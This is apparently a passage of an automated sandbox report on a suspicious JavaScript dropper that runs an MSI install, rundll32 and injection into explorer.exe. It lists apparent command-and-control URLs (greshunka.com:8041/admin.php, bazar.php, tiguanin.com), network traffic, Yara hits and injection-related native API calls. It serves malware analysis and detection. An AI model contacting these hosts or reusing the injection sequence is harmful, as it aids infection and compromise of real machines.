                  Source: explorer.exe, 00000008.00000000.2452717662.0000000009BA9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3346806877.0000000009BB1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3094015474.0000000009BA9000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://excel.office.com
                  Source: rundll32.exe, 00000006.00000002.3332514374.000001FF4C9D1000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2310895325.000001FF4C9D5000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3030733974.000001FF4C9D3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2253330460.000001FF4C9D6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2408323389.000001FF4C9D6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2219769270.000001FF4C9D6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://greshunka.com/
                  Source: rundll32.exe, 00000006.00000002.3332514374.000001FF4C9D1000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2310895325.000001FF4C9D5000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3030733974.000001FF4C9D3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2253330460.000001FF4C9D6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2408323389.000001FF4C9D6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2219769270.000001FF4C9D6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://greshunka.com/g;
                  Source: rundll32.exe, 00000006.00000003.2526611682.000001FF4CA15000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://greshunka.com:8041/
                  Source: rundll32.exe, 00000006.00000003.2526611682.000001FF4CA15000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://greshunka.com:8041/I
                  Source: rundll32.exe, 00000006.00000003.2526611682.000001FF4CA15000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2408323389.000001FF4C9D6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2219769270.000001FF4C9D6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3295432938.000001FF4CA55000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://greshunka.com:8041/admin.php
                  Source: rundll32.exe, 00000006.00000003.2253330460.000001FF4C9FD000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2408323389.000001FF4C9FD000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2219769270.000001FF4C9FD000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2310895325.000001FF4C9FD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://greshunka.com:8041/admin.php-7
                  Source: rundll32.exe, 00000006.00000003.3295432938.000001FF4CA55000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://greshunka.com:8041/admin.phpGN
                  Source: rundll32.exe, 00000006.00000003.3248286213.000001FF4CA55000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://greshunka.com:8041/admin.phpUN
                  Source: rundll32.exe, 00000006.00000003.2526611682.000001FF4CA15000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://greshunka.com:8041/admin.phpi
                  Source: rundll32.exe, 00000006.00000003.2310895325.000001FF4C9D5000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2253330460.000001FF4C9D6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2408323389.000001FF4C9D6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2219769270.000001FF4C9D6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://greshunka.com:8041/admin.phpl.mui
                  Source: rundll32.exe, 00000006.00000002.3332514374.000001FF4C9D1000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2310895325.000001FF4C9D5000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3030733974.000001FF4C9D3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2253330460.000001FF4C9D6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2408323389.000001FF4C9D6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2219769270.000001FF4C9D6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://greshunka.com:8041/admin.phpp
                  Source: rundll32.exe, 00000006.00000003.3011956610.000001FF4CA15000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3149023230.000001FF4CA55000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3197779910.000001FF4CA55000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3295432938.000001FF4CA55000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://greshunka.com:8041/bazar.php
                  Source: rundll32.exe, 00000006.00000003.2927135917.000001FF4CA4A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://greshunka.com:8041/bazar.php3?8
                  Source: rundll32.exe, 00000006.00000003.3248286213.000001FF4CA55000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.3332514374.000001FF4CA55000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3149023230.000001FF4CA55000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3197779910.000001FF4CA55000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3295432938.000001FF4CA55000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://greshunka.com:8041/bazar.phpAm=
                  Source: rundll32.exe, 00000006.00000003.3197779910.000001FF4CA55000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://greshunka.com:8041/bazar.phpGN
                  Source: rundll32.exe, 00000006.00000003.3149156557.000001FF4CA15000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://greshunka.com:8041/bazar.phpq#(
                  Source: rundll32.exe, 00000006.00000003.2526611682.000001FF4CA15000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://greshunka.com:8041/net.com:8041/Pw
                  Source: explorer.exe, 00000008.00000002.3351439546.000000000C4DC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://isomicrotich.com/
                  Source: explorer.exe, 00000008.00000002.3352293048.000000000C642000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://isomicrotich.com/ECOMPARE.EXE.15Desktop
                  Source: explorer.exe, 00000008.00000002.3353202323.000000000C9A7000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://isomicrotich.com/eE
                  Source: explorer.exe, 00000008.00000002.3346806877.0000000009B41000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3352293048.000000000C642000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3352293048.000000000C81C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3352962994.000000000C933000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://isomicrotich.com/test/
                  Source: explorer.exe, 00000008.00000002.3346806877.0000000009B41000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://isomicrotich.com/test/3
                  Source: explorer.exe, 00000008.00000002.3352962994.000000000C933000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://isomicrotich.com/test/G
                  Source: explorer.exe, 00000008.00000002.3352293048.000000000C81C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://isomicrotich.com/test/M
                  Source: explorer.exe, 00000008.00000002.3346806877.00000000099B0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://isomicrotich.com/test/i
                  Source: explorer.exe, 00000008.00000002.3352962994.000000000C933000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://isomicrotich.com/test/l
                  Source: explorer.exe, 00000008.00000002.3353202323.000000000C9A7000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://isomicrotich.com/yEz
                  Source: explorer.exe, 00000008.00000002.3350911655.000000000B7DD000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: https://opewolumeras.com/test/
                  Source: explorer.exe, 00000008.00000002.3350911655.000000000B7DD000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: https://opewolumeras.com/test/P
                  Source: explorer.exe, 00000008.00000000.2452717662.0000000009D42000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3346806877.0000000009BB1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3094015474.0000000009BA9000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://outlook.com
                  Source: explorer.exe, 00000008.00000000.2456761349.000000000C460000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://powerpoint.office.comcember
                  Source: rundll32.exe, 00000006.00000003.2253330460.000001FF4CA15000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tiguanin.com/
                  Source: rundll32.exe, 00000006.00000003.2408323389.000001FF4CA15000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2310895325.000001FF4CA15000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3030377151.000001FF4CA1A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3036902410.000001FF4CA1E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3149156557.000001FF4CA15000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2219769270.000001FF4CA15000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.3332514374.000001FF4CA1D000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3030079674.000001FF4CA15000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3011956610.000001FF4CA15000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2526611682.000001FF4CA15000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2253330460.000001FF4CA15000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tiguanin.com/)
                  Source: rundll32.exe, 00000006.00000003.2310895325.000001FF4CA15000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3030079674.000001FF4CA4A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3030899621.000001FF4CA52000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3030550060.000001FF4CA4D000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.3332514374.000001FF4CA37000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2219769270.000001FF4CA15000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.3332514374.000001FF4CA1D000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3030793340.000001FF4CA4E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2526611682.000001FF4CA15000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2253330460.000001FF4CA15000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tiguanin.com:8041/
                  Source: rundll32.exe, 00000006.00000003.3036865447.000001FF4CA7A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3030485400.000001FF4CA7A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tiguanin.com:8041/$E
                  Source: rundll32.exe, 00000006.00000003.2219769270.000001FF4CA15000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tiguanin.com:8041/%
                  Source: rundll32.exe, 00000006.00000003.2526611682.000001FF4CA15000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tiguanin.com:8041/&
                  Source: rundll32.exe, 00000006.00000003.3036865447.000001FF4CA7A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3030485400.000001FF4CA7A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tiguanin.com:8041/0E
                  Source: rundll32.exe, 00000006.00000002.3332514374.000001FF4CA42000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tiguanin.com:8041/8~
                  Source: rundll32.exe, 00000006.00000003.2408323389.000001FF4CA15000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2310895325.000001FF4CA15000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2219769270.000001FF4CA15000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2253330460.000001FF4CA15000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tiguanin.com:8041/F
                  Source: rundll32.exe, 00000006.00000002.3332514374.000001FF4CA1D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tiguanin.com:8041/L
                  Source: rundll32.exe, 00000006.00000003.2408323389.000001FF4CA15000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tiguanin.com:8041/N
                  Source: rundll32.exe, 00000006.00000003.2408323389.000001FF4CA15000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tiguanin.com:8041/Q
                  Source: rundll32.exe, 00000006.00000003.2219769270.000001FF4CA15000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tiguanin.com:8041/Y
                  Source: rundll32.exe, 00000006.00000003.2408323389.000001FF4CA15000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tiguanin.com:8041/admin.php
                  Source: rundll32.exe, 00000006.00000003.2310895325.000001FF4CA15000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tiguanin.com:8041/admin.php.
                  Source: rundll32.exe, 00000006.00000003.2408323389.000001FF4CA15000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2310895325.000001FF4CA15000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3030377151.000001FF4CA1A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3036902410.000001FF4CA1E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3149156557.000001FF4CA15000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.3332514374.000001FF4CA1D000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3030079674.000001FF4CA15000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3011956610.000001FF4CA15000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2526611682.000001FF4CA15000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tiguanin.com:8041/admin.php=
                  Source: rundll32.exe, 00000006.00000003.2408323389.000001FF4CA15000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2310895325.000001FF4CA15000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3030377151.000001FF4CA1A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3036902410.000001FF4CA1E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3149156557.000001FF4CA15000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.3332514374.000001FF4CA1D000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3030079674.000001FF4CA15000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3011956610.000001FF4CA15000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2526611682.000001FF4CA15000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tiguanin.com:8041/admin.phpM
                  Source: rundll32.exe, 00000006.00000003.2253330460.000001FF4CA15000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tiguanin.com:8041/bazar.php
                  Source: rundll32.exe, 00000006.00000003.3031010424.000001FF4CA63000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3030079674.000001FF4CA4A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3030899621.000001FF4CA52000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3030550060.000001FF4CA4D000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3030793340.000001FF4CA4E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tiguanin.com:8041/oQ
                  Source: explorer.exe, 00000008.00000002.3346806877.00000000099C0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.2452717662.00000000099C0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://wns.windows.com/)s
                  Source: explorer.exe, 00000008.00000002.3346806877.00000000099C0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.2452717662.00000000099C0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://word.office.comon
                  Source: MSIF1BF.tmp.1.dr, MSI7623.tmp.1.dr, MSIF1DF.tmp.1.dr, MSIF101.tmp.1.dr, MSIF22E.tmp.1.dr, MSIF29D.tmp.1.dr, MSIF160.tmp.1.drString found in binary or memory: https://www.advancedinstaller.com
                  Source: MSIF1BF.tmp.1.dr, MSI7623.tmp.1.dr, MSIF1DF.tmp.1.dr, MSIF101.tmp.1.dr, MSIF22E.tmp.1.dr, MSIF29D.tmp.1.dr, MSIF160.tmp.1.drString found in binary or memory: https://www.digicert.com/CPS0
                  Source: MSIF1BF.tmp.1.dr, MSI7623.tmp.1.dr, MSIF1DF.tmp.1.dr, MSIF101.tmp.1.dr, MSIF22E.tmp.1.dr, MSIF29D.tmp.1.dr, MSIF160.tmp.1.drString found in binary or memory: https://www.thawte.com/cps0/
                  Source: MSIF1BF.tmp.1.dr, MSI7623.tmp.1.dr, MSIF1DF.tmp.1.dr, MSIF101.tmp.1.dr, MSIF22E.tmp.1.dr, MSIF29D.tmp.1.dr, MSIF160.tmp.1.drString found in binary or memory: https://www.thawte.com/repository0W
                  Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50053
                  Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50048
                  Source: unknown Network traffic detected: HTTP traffic on port 50050 -> 443
                  Source: unknown Network traffic detected: HTTP traffic on port 50051 -> 443
                  Source: unknown Network traffic detected: HTTP traffic on port 50048 -> 443
                  Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50050
                  Source: unknown Network traffic detected: HTTP traffic on port 50053 -> 443
                  Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50051
                  Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:50048 version: TLS 1.2
                  Source: rundll32.exe, 00000006.00000003.2067028655.000001FF4CAD7000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: DirectInput8Create memstr_4797e325-3
                  Source: rundll32.exe, 00000006.00000003.2067028655.000001FF4CAD7000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: GetRawInputData memstr_2984fdd2-5
                  Source: Yara match File source: 00000006.00000003.2067028655.000001FF4CAD7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match File source: Process Memory Space: rundll32.exe PID: 5880, type: MEMORYSTR

                  System Summary

                  Source: Document-18-33-08.js Static file information: Suspicious name
                  Source: C:\Windows\System32\wscript.exe COM Object queried: Microsoft Windows Installer HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{000C1090-0000-0000-C000-000000000046}
                  Source: C:\Windows\System32\rundll32.exe Code function: 6_3_000001FF4C9CDACE NtReadFile, 6_3_000001FF4C9CDACE
                  Source: C:\Windows\System32\rundll32.exe Code function: 6_3_000001FF4C9CD9FE NtOpenFile, 6_3_000001FF4C9CD9FE
                  Source: C:\Windows\System32\rundll32.exe Code function: 6_3_000001FF4C9CDA6E NtProtectVirtualMemory, 6_3_000001FF4C9CDA6E
                  Source: C:\Windows\System32\rundll32.exe Code function: 6_3_000001FF4C9CD98E NtAllocateVirtualMemory, 6_3_000001FF4C9CD98E
                  Source: C:\Windows\System32\rundll32.exe Code function: 6_2_000001FF4CAE7A50 NtSetContextThread, 6_2_000001FF4CAE7A50
                  Source: C:\Windows\System32\rundll32.exe Code function: 6_2_000001FF4CAEF3A0 CreateToolhelp32Snapshot, Thread32First, NtSuspendThread, NtResumeThread, Thread32Next, NtClose, 6_2_000001FF4CAEF3A0
                  Source: C:\Windows\System32\rundll32.exe Code function: 6_2_000001FF4CAD17B0 NtClose, 6_2_000001FF4CAD17B0
                  Source: C:\Windows\System32\rundll32.exe Code function: 6_2_000001FF4CB04FF0 NtQueueApcThread, 6_2_000001FF4CB04FF0
                  Source: C:\Windows\System32\rundll32.exe Code function: 6_2_000001FF4CB04BE0 NtProtectVirtualMemory, 6_2_000001FF4CB04BE0
                  Source: C:\Windows\System32\rundll32.exe Code function: 6_2_000001FF4CB03F40 NtAllocateVirtualMemory, 6_2_000001FF4CB03F40
                  Source: C:\Windows\System32\rundll32.exe Code function: 6_2_000001FF4CB04740 NtFreeVirtualMemory, 6_2_000001FF4CB04740
                  Source: C:\Windows\System32\rundll32.exe Code function: 6_2_000001FF4CB04360 NtCreateThreadEx, 6_2_000001FF4CB04360
                  Source: C:\Windows\System32\rundll32.exe Code function: 6_2_000001FF4CAE55C0 NtClose, NtTerminateThread, 6_2_000001FF4CAE55C0
                  Source: C:\Windows\System32\rundll32.exe Code function: 6_2_000001FF4CB051C0 NtReadVirtualMemory, 6_2_000001FF4CB051C0
                  Source: C:\Windows\System32\rundll32.exe Code function: 6_2_000001FF4CAD71B0 NtClose, 6_2_000001FF4CAD71B0
                  Source: C:\Windows\System32\rundll32.exe Code function: 6_2_000001FF4CAD1600 NtClose, RtlExitUserThread, 6_2_000001FF4CAD1600
                  Source: C:\Windows\System32\rundll32.exe Code function: 6_2_000001FF4CB045F0 NtDuplicateObject, 6_2_000001FF4CB045F0
                  Source: C:\Windows\System32\rundll32.exe Code function: 6_2_000001FF4CAE8149 NtSetContextThread, 6_2_000001FF4CAE8149
                  Source: C:\Windows\explorer.exe Code function: 8_2_0305C704 NtDelayExecution, 8_2_0305C704
                  Source: C:\Windows\explorer.exe Code function: 8_2_0305B388 NtAllocateVirtualMemory, 8_2_0305B388
                  Source: C:\Windows\explorer.exe Code function: 8_2_030582B4 NtFreeVirtualMemory, 8_2_030582B4
                  Source: C:\Windows\explorer.exe Code function: 8_2_030601A0 NtFreeVirtualMemory, 8_2_030601A0
                  Source: C:\Windows\explorer.exe Code function: 8_2_030581C8 NtWriteFile, 8_2_030581C8
                  Source: C:\Windows\explorer.exe Code function: 8_2_03058240 NtClose, 8_2_03058240
                  Source: C:\Windows\explorer.exe Code function: 8_2_030580B8 RtlInitUnicodeString, NtCreateFile, 8_2_030580B8
                  Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\MSI7623.tmp
                  Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\MSIF101.tmp
                  Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\MSIF160.tmp
                  Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\MSIF1BF.tmp
                  Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\MSIF1DF.tmp
                  Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\inprogressinstallinfo.ipi
                  Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\MSIF22E.tmp
                  Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\MSIF29D.tmp
                  Source: C:\Windows\System32\msiexec.exe File deleted: C:\Windows\Installer\MSIF101.tmp
                  Source: C:\Windows\System32\rundll32.exeCode function: 6_2_00000001800324086_2_0000000180032408
                  Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000000018001F4486_2_000000018001F448
                  Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000000018001D4906_2_000000018001D490
                  Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000000018004249C6_2_000000018004249C
                  Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000000018001E4F06_2_000000018001E4F0
                  Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000000018002C4F86_2_000000018002C4F8
                  Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000000018001C5006_2_000000018001C500
                  Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000000018004C5106_2_000000018004C510
                  Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000000018001F5506_2_000000018001F550
                  Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000000018002E5546_2_000000018002E554
                  Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000000018003356C6_2_000000018003356C
                  Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000000018002358C6_2_000000018002358C
                  Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000000018001D5986_2_000000018001D598
                  Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000000018002159C6_2_000000018002159C
                  Source: C:\Windows\System32\rundll32.exeCode function: 6_2_00000001800245AC6_2_00000001800245AC
                  Source: C:\Windows\System32\rundll32.exeCode function: 6_2_00000001800225BC6_2_00000001800225BC
                  Source: C:\Windows\System32\rundll32.exeCode function: 6_2_00000001800255CC6_2_00000001800255CC
                  Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000000018001C6086_2_000000018001C608
                  Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000000018002B6206_2_000000018002B620
                  Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000000018001F6586_2_000000018001F658
                  Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000000018001E65C6_2_000000018001E65C
                  Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000000018001D6A06_2_000000018001D6A0
                  Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000000018002E6D06_2_000000018002E6D0
                  Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000000018001C7106_2_000000018001C710
                  Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000000018001F7606_2_000000018001F760
                  Source: C:\Windows\System32\rundll32.exeCode function: 6_2_00000001800217846_2_0000000180021784
                  Source: C:\Windows\System32\rundll32.exeCode function: 6_2_00000001800247946_2_0000000180024794
                  Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000000018001E7A06_2_000000018001E7A0
                  Source: C:\Windows\System32\rundll32.exeCode function: 6_2_00000001800227A86_2_00000001800227A8
                  Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000000018001D7A86_2_000000018001D7A8
                  Source: C:\Windows\System32\rundll32.exeCode function: 6_2_00000001800317BC6_2_00000001800317BC
                  Source: C:\Windows\System32\rundll32.exeCode function: 6_2_00000001800237BC6_2_00000001800237BC
                  Source: C:\Windows\System32\rundll32.exeCode function: 6_2_00000001800327EC6_2_00000001800327EC
                  Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000000018001C81C6_2_000000018001C81C
                  Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000000018004A8386_2_000000018004A838
                  Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000000018001F8B86_2_000000018001F8B8
                  Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000000018001E8E46_2_000000018001E8E4
                  Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000000018001D9006_2_000000018001D900
                  Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000000018002C9046_2_000000018002C904
                  Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000000018001C9786_2_000000018001C978
                  Source: C:\Windows\System32\rundll32.exeCode function: 6_2_00000001800229906_2_0000000180022990
                  Source: C:\Windows\System32\rundll32.exeCode function: 6_2_00000001800239A86_2_00000001800239A8
                  Source: C:\Windows\System32\rundll32.exeCode function: 6_2_00000001800219B06_2_00000001800219B0
                  Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000000018002B9B46_2_000000018002B9B4
                  Source: C:\Windows\System32\rundll32.exeCode function: 6_2_00000001800249C06_2_00000001800249C0
                  Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000000018001F9C06_2_000000018001F9C0
                  Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000000018001DA086_2_000000018001DA08
                  Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000000018001EA286_2_000000018001EA28
                  Source: C:\Windows\System32\rundll32.exeCode function: 6_2_0000000180033A3C6_2_0000000180033A3C
                  Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000000018001CA806_2_000000018001CA80
                  Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000000018001FAC86_2_000000018001FAC8
                  Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000000018001DB106_2_000000018001DB10
                  Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000000018001EB586_2_000000018001EB58
                  Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000000018001CB886_2_000000018001CB88
                  Source: C:\Windows\System32\rundll32.exeCode function: 6_2_0000000180023B946_2_0000000180023B94
                  Source: C:\Windows\System32\rundll32.exeCode function: 6_2_0000000180021B986_2_0000000180021B98
                  Source: C:\Windows\System32\rundll32.exeCode function: 6_2_0000000180024BA86_2_0000000180024BA8
